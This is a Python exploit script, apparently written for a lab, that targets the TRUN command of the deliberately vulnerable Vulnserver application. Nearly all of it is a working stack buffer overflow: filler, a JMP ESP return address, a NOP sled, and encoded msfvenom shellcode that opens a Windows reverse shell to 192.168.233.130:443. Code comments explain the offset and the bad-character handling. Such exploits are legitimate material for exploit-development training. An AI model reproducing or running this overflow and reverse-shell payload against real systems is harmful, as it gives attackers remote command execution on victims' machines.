- #!/usr/bin/env python3
- # Vulnserver TRUN Buffer Overflow
- # Coded by: Ismael Vazquez (https://iamismael.com)
- import socket
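def _echo_reply(sock):
    """Read up to 1 KiB from *sock* and print it without adding a newline.

    Undecodable bytes are replaced instead of raising, so an unexpected
    binary banner cannot abort the exploit mid-conversation.
    """
    data = sock.recv(1024)
    print(data.decode(errors="replace"), end="")


def pwn(exploit, host="192.168.233.129", port=9999, timeout=None):
    """Send *exploit* to Vulnserver's TRUN command, then send EXIT.

    The payload is delivered as ``TRUN . `` + *exploit* terminated with CRLF,
    and every reply from the target is echoed to stdout as it arrives.

    Args:
        exploit: Raw bytes placed after ``TRUN . `` (filler, return address,
            NOP sled and shellcode are the caller's responsibility).
        host: Target address; defaults to the lab VM used by this script.
        port: Target TCP port (Vulnserver listens on 9999 by default).
        timeout: Per-operation socket timeout in seconds. ``None`` keeps the
            original fully blocking behaviour. A timeout is reported as a
            warning rather than an error: once the overflow has hijacked EIP
            the server never answers, so a hang is the expected outcome of
            a *successful* run and should not be misreported as a failure.

    Raises:
        SystemExit: on any other socket error (connection refused, reset)
            after printing the reason; exit status 1 instead of the
            original ``exit()`` (which returned 0 on failure).
    """
    request = b"".join((b"TRUN . ", exploit, b"\r\n"))
    print("[*] Connecting to remote host.")
    try:
        # The context manager closes the socket on every path, success or
        # error; the original only closed it in two hand-written places.
        with socket.create_connection((host, port), timeout=timeout) as s:
            _echo_reply(s)
            print("[*] Payload being sent over the wire")
            # sendall, not send: send() may write only a prefix of a large
            # buffer, which would silently truncate the exploit string.
            s.sendall(request)
            _echo_reply(s)
            print("[*] Sending exit command.")
            s.sendall(b"EXIT\r\n")
            _echo_reply(s)
    except socket.timeout:
        print("[!] No reply before timeout; target may have crashed or been hijacked.")
    except OSError as err:
        # Narrow except: the original bare `except:` also swallowed
        # KeyboardInterrupt and blamed every failure on the connect().
        print(f"Unable to connect to remote host. Terminating... ({err})")
        raise SystemExit(1)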
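# --- exploit layout: filler + return address + NOP sled + shellcode ---------

# Filler that reaches the saved return address. NOTE(review): the overflow
# offset is measured from the start of the whole TRUN line, so it depends on
# the "TRUN . " prefix that pwn() prepends — re-measure with a cyclic pattern
# if that prefix (or the target build) changes.
buffer = b"A" * 2005

# Return address 0x625011af (the gadget noted in the original as 625011af),
# written little-endian so the overwritten EIP lands on it.
JMP_ESP = 0x625011AF
eip_addr = JMP_ESP.to_bytes(4, "little")  # == b"\xaf\x11\x50\x62"

# msfvenom -p windows/shell_reverse_tcp --arch x86 --platform windows LHOST=192.168.233.130 LPORT=443 -e x86/shikata_ga_nai -f python -v payload -b "\x00"
# Reverse shell back to 192.168.233.130:443; shikata_ga_nai-encoded with
# \x00 excluded, since the vulnerable copy is string-based and a NUL would
# truncate everything after it.
payload = b"".join((
    b"\xbe\x3c\x77\x61\xc4\xda\xc9\xd9\x74\x24\xf4\x5f",
    b"\x29\xc9\xb1\x52\x31\x77\x12\x03\x77\x12\x83\xd3",
    b"\x8b\x83\x31\xd7\x9c\xc6\xba\x27\x5d\xa7\x33\xc2",
    b"\x6c\xe7\x20\x87\xdf\xd7\x23\xc5\xd3\x9c\x66\xfd",
    b"\x60\xd0\xae\xf2\xc1\x5f\x89\x3d\xd1\xcc\xe9\x5c",
    b"\x51\x0f\x3e\xbe\x68\xc0\x33\xbf\xad\x3d\xb9\xed",
    b"\x66\x49\x6c\x01\x02\x07\xad\xaa\x58\x89\xb5\x4f",
    b"\x28\xa8\x94\xde\x22\xf3\x36\xe1\xe7\x8f\x7e\xf9",
    b"\xe4\xaa\xc9\x72\xde\x41\xc8\x52\x2e\xa9\x67\x9b",
    b"\x9e\x58\x79\xdc\x19\x83\x0c\x14\x5a\x3e\x17\xe3",
    b"\x20\xe4\x92\xf7\x83\x6f\x04\xd3\x32\xa3\xd3\x90",
    b"\x39\x08\x97\xfe\x5d\x8f\x74\x75\x59\x04\x7b\x59",
    b"\xeb\x5e\x58\x7d\xb7\x05\xc1\x24\x1d\xeb\xfe\x36",
    b"\xfe\x54\x5b\x3d\x13\x80\xd6\x1c\x7c\x65\xdb\x9e",
    b"\x7c\xe1\x6c\xed\x4e\xae\xc6\x79\xe3\x27\xc1\x7e",
    b"\x04\x12\xb5\x10\xfb\x9d\xc6\x39\x38\xc9\x96\x51",
    b"\xe9\x72\x7d\xa1\x16\xa7\xd2\xf1\xb8\x18\x93\xa1",
    b"\x78\xc9\x7b\xab\x76\x36\x9b\xd4\x5c\x5f\x36\x2f",
    b"\x37\xa0\x6f\xc6\x45\x48\x72\x18\x4b\x32\xfb\xfe",
    b"\x21\x54\xaa\xa9\xdd\xcd\xf7\x21\x7f\x11\x22\x4c",
    b"\xbf\x99\xc1\xb1\x0e\x6a\xaf\xa1\xe7\x9a\xfa\x9b",
    b"\xae\xa5\xd0\xb3\x2d\x37\xbf\x43\x3b\x24\x68\x14",
    b"\x6c\x9a\x61\xf0\x80\x85\xdb\xe6\x58\x53\x23\xa2",
    b"\x86\xa0\xaa\x2b\x4a\x9c\x88\x3b\x92\x1d\x95\x6f",
    b"\x4a\x48\x43\xd9\x2c\x22\x25\xb3\xe6\x99\xef\x53",
    b"\x7e\xd2\x2f\x25\x7f\x3f\xc6\xc9\xce\x96\x9f\xf6",
    b"\xff\x7e\x28\x8f\x1d\x1f\xd7\x5a\xa6\x2f\x92\xc6",
    b"\x8f\xa7\x7b\x93\x8d\xa5\x7b\x4e\xd1\xd3\xff\x7a",
    b"\xaa\x27\x1f\x0f\xaf\x6c\xa7\xfc\xdd\xfd\x42\x02",
    b"\x71\xfd\x46",
))

# Short NOP sled between the landing point and the shellcode, giving the
# encoder's self-modifying decoder stub some clearance from the stack top.
padding = b"\x90" * 8

exploit_buf = buffer + eip_addr + padding + payload

# Fail fast on a bad character anywhere in the string, not just in the
# shellcode: a NUL in the return address or sled would truncate the copy
# just as surely as one in the payload. (Raise, not assert: assert is
# stripped under -O.)
if b"\x00" in exploit_buf:
    raise ValueError("exploit string contains a NUL byte; re-encode with -b '\\x00'")

# Guarded so importing this module (e.g. to reuse pwn()) does not fire the
# exploit; running it as a script behaves exactly as before.
if __name__ == "__main__":
    pwn(exploit_buf)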